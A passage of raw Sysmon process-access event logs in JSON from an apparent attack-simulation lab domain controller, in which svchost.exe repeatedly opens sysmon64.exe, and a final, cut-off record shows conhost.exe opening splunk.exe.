C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.955","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3604,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.955\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.955","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3605,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.955\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.955","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3606,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.955\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.955","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3607,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.955\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.955","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3608,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.955\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.955","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3609,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.955\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.955","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3610,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.955\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.955","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:34","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3611,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:34.955\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FF6-5F25-0000-0010128C0500}\r\nTargetProcessId: 5092\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 